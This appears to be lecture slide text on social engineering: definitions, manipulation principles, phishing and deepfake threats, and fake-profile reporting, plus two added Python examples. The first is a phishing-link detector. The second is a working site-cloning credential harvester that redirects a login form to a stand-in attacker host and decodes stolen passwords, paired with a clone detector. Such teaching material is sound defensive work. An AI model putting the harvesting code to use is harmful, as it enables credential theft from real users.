Social Engineering Definition
• “… uses psychological manipulation to trick users into making security mistakes or
giving away sensitive information.”
Imperva (Oct 2022) https://www.imperva.com/learn/application-security/social-engineering-attack/
• “… the art of manipulating people so they give up confidential information."
Webroot (Oct 2022) https://www.webroot.com/us/en/resources/tips-articles/what-is-social-engineering
• “… a manipulation technique that exploits human error to gain private information,
access, or valuables ... Once an attacker understands what motivates a user’s
actions, they can deceive and manipulate the user effectively."
Kaspersky (Oct 2022) https://www.kaspersky.com/resource-center/definitions/what-is-social-engineering
Social Engineering Principles (Reasons for Effectiveness)
• Authority and Trust
• Intimidation
• Consensus and Social Proof
• Scarcity
• Urgency
• Familiarity and Liking
https://xmind.app/embed/ERb5/
Model for Social Engineering Attacks
Wang, Z., Zhu, H., & Sun, L. (2021). Social Engineering in
Cybersecurity: Effect Mechanisms, Human Vulnerabilities and
Attack Methods. IEEE Access, 9, 11895–11910.
https://doi.org/10.1109/ACCESS.2021.3051633
Why does it work?
Human attribute and the social engineering technique that exploits it:
Trust: Bhutanese people are trusting, so an attacker finds it easy to gain a victim's confidence
• Direct approach
• Technical expert
The desire to be 'helpful': most Bhutanese people are kind
• Direct approach
• Technical expert
• Voice of authority
The wish to get something for nothing
• Chain email
• SMS
Curiosity
• Opening email attachments from unknown senders
• Spam
Fear of the unknown, or of losing something
• Popup window
Ignorance
• Direct approach
• Dumpster diving
https://www.academia.edu/8216745/Social_Engineering_it_s_impact_on_organization
Let me guess?
• What is 1+1?
• What is 2+2?
• What is 3+3?
• What is 4+4?
• What is 5+5?
• What is 6+6?
• What is 7+7?
• What is 8+8?
• Name a vegetable?
Social Engineering Attack Framework
Mouton, F., Leenen, L., & Venter, H. S. (2016). Social
engineering attack examples, templates and
scenarios. Computers & Security, 59, 186–209.
https://doi.org/10.1016/j.cose.2016.03.004
Life cycle of attack
https://www.imperva.com/learn/application-security/social-engineering-attack/
Types of attacks
• Pretexting
• Baiting
• Quid Pro Quo
• Scareware
• Phishing, Smishing, Vishing, Whaling
• Telephone-oriented Attack Delivery (TOAD)
• Tailgating
Mouton, F., Leenen, L., & Venter, H. S. (2016). Social engineering attack examples, templates and scenarios. Computers & Security, 59, 186–209.
https://doi.org/10.1016/j.cose.2016.03.004
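The phishing family in the list above (phishing, smishing, whaling) almost always hinges on a link that looks as if it goes somewhere trusted. The script below is an added example written for this page, not code from Mouton et al. or from any tool the deck cites. It runs three checks over a constructed sample email: visible link text that names one domain while the href goes to another, punycode (xn--) hosts used for homograph lookalikes, and hosts within a couple of character edits of a brand on an assumed trusted list. The trusted list, the sample email and every domain in it are constructed for the example.

```python
"""Flag deceptive links in an HTML email body (added example, stdlib only)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist of brands the reader trusts; a real deployment would load its own.
TRUSTED_DOMAINS = ["paypal.com", "microsoft.com", "google.com"]

# Constructed sample email: one honest link and three lures.
SAMPLE_EMAIL = """
<p>Your account is limited. Please <a href="http://paypal.com.verify-account.example/login">
log in at paypal.com</a> within 24 hours.</p>
<p>Questions? Visit <a href="https://www.paypal.com/help">www.paypal.com/help</a>.</p>
<p>Or use <a href="https://xn--pypal-4ve.com/">our secure mirror</a>.</p>
<p>Billing: <a href="https://paypa1.com/billing">click here</a></p>
"""


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Crude eTLD+1 (last two labels); fine for .com-style hosts, wrong for .co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def edit_distance(a, b):
    """Levenshtein distance, used to catch paypa1.com-style lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


_DOMAIN_IN_TEXT = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def analyze_links(html):
    """Return one finding per suspicious anchor, with the reasons it was flagged."""
    parser = _AnchorCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        host = urlparse(href).hostname or ""
        if not host:
            continue  # mailto:, relative links etc. carry no host to judge
        href_dom = registrable_domain(host)
        reasons = []
        shown = _DOMAIN_IN_TEXT.search(text)
        if shown and registrable_domain(shown.group(1)) != href_dom:
            reasons.append("text/href mismatch: text says %s" % shown.group(1))
        if any(label.startswith("xn--") for label in host.split(".")):
            reasons.append("punycode host")
        for trusted in TRUSTED_DOMAINS:
            d = edit_distance(href_dom, trusted)
            if 0 < d <= 2:
                reasons.append("lookalike of %s (distance %d)" % (trusted, d))
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_links(SAMPLE_EMAIL):
        print(f["href"], "->", "; ".join(f["reasons"]))
```

The registrable-domain helper takes the last two labels, which misjudges country-code second-level domains such as .co.uk; a production version would consult the public suffix list. An edit distance of 2 is deliberately loose and will flag some unrelated short domains, so treat the output as triage for a human, not a verdict.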
Phishing statistics
• 18-39-year-olds have an average click rate of 29%; the rate drops to 19% among older age groups.
• 23% of male participants opened a phishing email, compared with 10% of women.
• Public sector organizations were the most vulnerable to phishing attacks, with an average click rate of 36%.
https://betanews.com/2022/10/13/older-generations-are-less-likely-to-click-phishing-emails/
How to Detect a Fake Profile
• Profile photo
– Do a search using the image
– https://support.google.com/websearch/answer/1325808
• Username
• The Biography
• Profile content
• Number of followers
How to Report a Fake Profile
• Twitter
– https://help.twitter.com/en/forms/authenticity/impersonation
• Instagram
– https://help.instagram.com/contact/636276399721841
• Facebook (Meta)
– https://www.facebook.com/help/306643639690823
• LinkedIn
– Click the More icon on the member’s profile.
– Click Report or block.
• TikTok
– Go to the profile of the account you want to report.
– Tap the Settings icon
– Tap “Report” and follow the steps in the app.
Deep Fakes
• Deepfake technology allows users to
impersonate others with startling accuracy.
– Deep Video Fakes
(https://youtu.be/kOIMXt8KK8M)
– Deep Voice Fakes
(https://youtu.be/0ybLCfVeFL4)
• Anyone can find deepfake software and services
on the internet and have a relatively convincing
representation of another person within minutes.
– https://github.com/iperov/DeepFaceLab
– https://github.com/sibozhang/Text2Video
• Synthetic Identities are created by applying for
credit using a combination of real and fake, or
sometimes entirely fake, information.
Deep Fakes
• … with the help of deepfakes,
fraudsters can orchestrate social
engineering attacks that appear
to come from a friend or
colleague, that is, someone we
know and trust and whose
motives do not need to be
questioned.
Ap Wang Drugye - https://dorjipenjore.files.wordpress.com/2015/09/oral-traditions-and-expressions-yeshi-lhendup.pdf and https://www.bhutan-discover.de/ueber-bhutan/festivalkalender.html
Adam/ Eve cartoon - https://www.toonpool.com/cartoons/Adam%20and%20Eve_301321#img9
Buddha - https://buddhaweekly.com/meditation-techniques-for-people-with-unsettled-monkey-minds/buddha-weekly-buddha-hand-holds-the-monkey-king-buddhism/
Historical examples of manipulation by deception
Adam and Eve: the snake tricks them into eating the apple
Buddha tricks the Monkey King
Ap Wang Drugye (the Bhutanese trickster)
Z. Wang, H. Zhu and L. Sun, "Social Engineering in Cybersecurity: Effect Mechanisms, Human Vulnerabilities and Attack Methods," in IEEE Access, vol. 9, pp. 11895-11910, 2021, doi: 10.1109/ACCESS.2021.3051633.
https://www.academia.edu/8216745/Social_Engineering_it_s_impact_on_organization
The "Why does it work?" table is taken from the 2014 seminar report by Tshewang Dorji, "Social Engineering: it's impact on organization and individual in Bhutan".
$100 Million Google and Facebook Spear Phishing Scam
https://www.theguardian.com/technology/2017/mar/22/phishing-scam-us-tech-companies-tricked-100-million-lithuanian-man
https://twitter.com/fbi/status/1222279332359360512
https://www.justice.gov/usao-sdny/pr/lithuanian-man-sentenced-5-years-prison-theft-over-120-million-fraudulent-business
https://www.ic3.gov/Media/Y2019/PSA190910
Mind-Reading (1)
The "carrot" trick is quite a popular and effective one, but don't question why or how it works. It just does!
How the trick is done:
Write down the word "carrot" on a piece of paper.
Give it to your friend but tell them not to look at it... yet.
Let them hold on to it so they know there's no cheating going on.
Next, ask them "what's 1+1?" and wait for them to answer.
Ask "what's 2+2?" and wait for them to answer.
Keep going until you get to 8+8.
After they answer, ask them to name a vegetable.
Result: 90% of the time they will think of a carrot. They don't realize it, but their answer is already there on the piece of paper you gave them. Mathematical tricks like this are tools mentalists use to "read" people's minds. The usual explanation is that we have two modes of thinking: when the deliberate, higher cognitive function is kept busy, we fall back into a very suggestible state. Some think the trick works because the counting reminds us of children's books and carrots are the most common vegetable that kids in the U.S. learn about. That said, exactly how it works is frequently debated.
https://www.imperva.com/learn/application-security/social-engineering-attack/
https://healthitsecurity.com/features/common-types-of-social-engineering-phishing-attacks-in-healthcare
Mouton, F., Leenen, L., & Venter, H. S. (2016). Social engineering attack examples, templates and scenarios. Computers & Security, 59, 186–209. https://doi.org/10.1016/j.cose.2016.03.004
telephone-oriented attack delivery (TOAD)
https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery
https://www.barringtonstoke.co.uk/wp-content/uploads/2019/03/9781781128442.jpg
https://betanews.com/2022/10/13/older-generations-are-less-likely-to-click-phishing-emails/
The phishing statistics above come from research by the security awareness training company SoSafe, as reported by BetaNews.
THE SOCIAL-ENGINEER TOOLKIT (SET)
The Social-Engineer Toolkit (SET) was created and written by Dave Kennedy, the founder of TrustedSec. It is an open-source, Python-driven tool aimed at penetration testing around social engineering.
SET has a number of custom attack vectors that let you build a believable attack quickly. For example, the attacker can clone a legitimate website and trick the victim into visiting the link and entering their credentials.
https://securitytrails.com/blog/the-social-engineering-toolkit
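To make the SET credential-harvesting vector concrete, the following is an added example written for this page; it is not SET's or TrustedSec's code. It shows the three moves a site cloner makes: rewrite the login form so it posts to the attacker, decode the victim's POST, and send the victim on to the real site so nothing looks wrong. It then shows the defender-side check that catches the result: a page that loads its logo and stylesheet from one domain but is served from, and posts to, another. The site names, the sample login page and the POST body are constructed for the example.

```python
"""Credential-harvesting clone: what it does and what gives it away (added example)."""
import re
from urllib.parse import parse_qs, urljoin, urlparse

ORIGINAL_URL = "https://login.bank.example/signin"   # assumed real site
HARVESTER_URL = "http://login-bank.example/signin"   # assumed attacker host

# Constructed stand-in for the real login page the cloner would fetch.
ORIGINAL_PAGE = """<html><head><link rel="stylesheet" href="/static/site.css"></head>
<body><img src="https://cdn.bank.example/logo.png">
<form method="post" action="/signin">
<input name="user"><input name="pass" type="password"><button>Sign in</button>
</form></body></html>"""

# Matches action=, src= and href= attributes; group 3 is the quoted value.
_ATTR = re.compile(r'\b(action|src|href)\s*=\s*(["\'])(.*?)\2', re.I)


def _registrable(host):
    """Crude eTLD+1 (last two labels); enough for the .example hosts used here."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def clone_for_harvesting(page_html, original_url, harvester_url):
    """Attacker side. Asset URLs are made absolute so the clone still renders
    when served from the attacker's host; only the form action is redirected."""
    def _swap(m):
        name, quote, value = m.group(1), m.group(2), m.group(3)
        new = harvester_url if name.lower() == "action" else urljoin(original_url, value)
        return f"{name}={quote}{new}{quote}"
    return _ATTR.sub(_swap, page_html)


def harvest_post(body, original_url):
    """Attacker side: decode the victim's form POST. The listener records the
    fields and answers with a redirect to original_url, the real login page."""
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    return fields, original_url


def clone_signals(page_html, page_url):
    """Defender side: which domains the page pulls assets from versus the domain
    it is served from and posts to. A login page whose logo and CSS belong to
    bank.example but which is served from login-bank.example is a clone."""
    page_dom = _registrable(urlparse(page_url).hostname or "")
    asset_domains, post_domains = set(), set()
    for m in _ATTR.finditer(page_html):
        host = urlparse(urljoin(page_url, m.group(3))).hostname or ""
        bucket = post_domains if m.group(1).lower() == "action" else asset_domains
        bucket.add(_registrable(host))
    foreign = asset_domains - {page_dom}
    return {
        "served_from": page_dom,
        "assets_from_other_domains": sorted(foreign),
        "posts_to": sorted(post_domains),
        "looks_cloned": bool(foreign) and page_dom in post_domains,
    }


if __name__ == "__main__":
    cloned = clone_for_harvesting(ORIGINAL_PAGE, ORIGINAL_URL, HARVESTER_URL)
    print(clone_signals(cloned, HARVESTER_URL))
    print(harvest_post("user=alice&pass=hunter2", ORIGINAL_URL))
```

Legitimate sites also load assets from third-party CDNs, so foreign assets alone are a weak signal; what matters is that the assets belong to the brand the page imitates while the form posts to the page's own, different domain. From the victim's seat the cloned page is pixel-identical to the real one, which is why the address bar, not the page content, is the thing to check.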
lively conversation between
Robert Downey, Jr. (Avengers: Endgame, Dolittle),
George Lucas (Star Wars, Indiana Jones),
Tom Cruise (Mission: Impossible, Edge of Tomorrow),
Ewan McGregor (Doctor Sleep, Obi-Wan), and
Jeff Goldblum (The World According to Jeff Goldblum, Jurassic World 3),
moderated by Mark Ellis (Dog Stepfather).
https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Deepfake-Social-Engineering-Creating-A-Framework-For-Synthetic-Media-Social-Engineering.pdf
https://www.securityweek.com/deepfakes-are-growing-threat-cybersecurity-and-society-Europol
https://www.rapid7.com/blog/post/2021/12/06/deepfakes-a-nascent-cybersecurity-threat/
Rapid7 (2021):
In 2019, we identified 40 posts on dark web hacking forums discussing deepfakes.
In 2020, that number rose to 94 posts.
In 2021, we've seen a total of 92 posts so far — this number will likely outpace the prior year's 94 by the end of the year.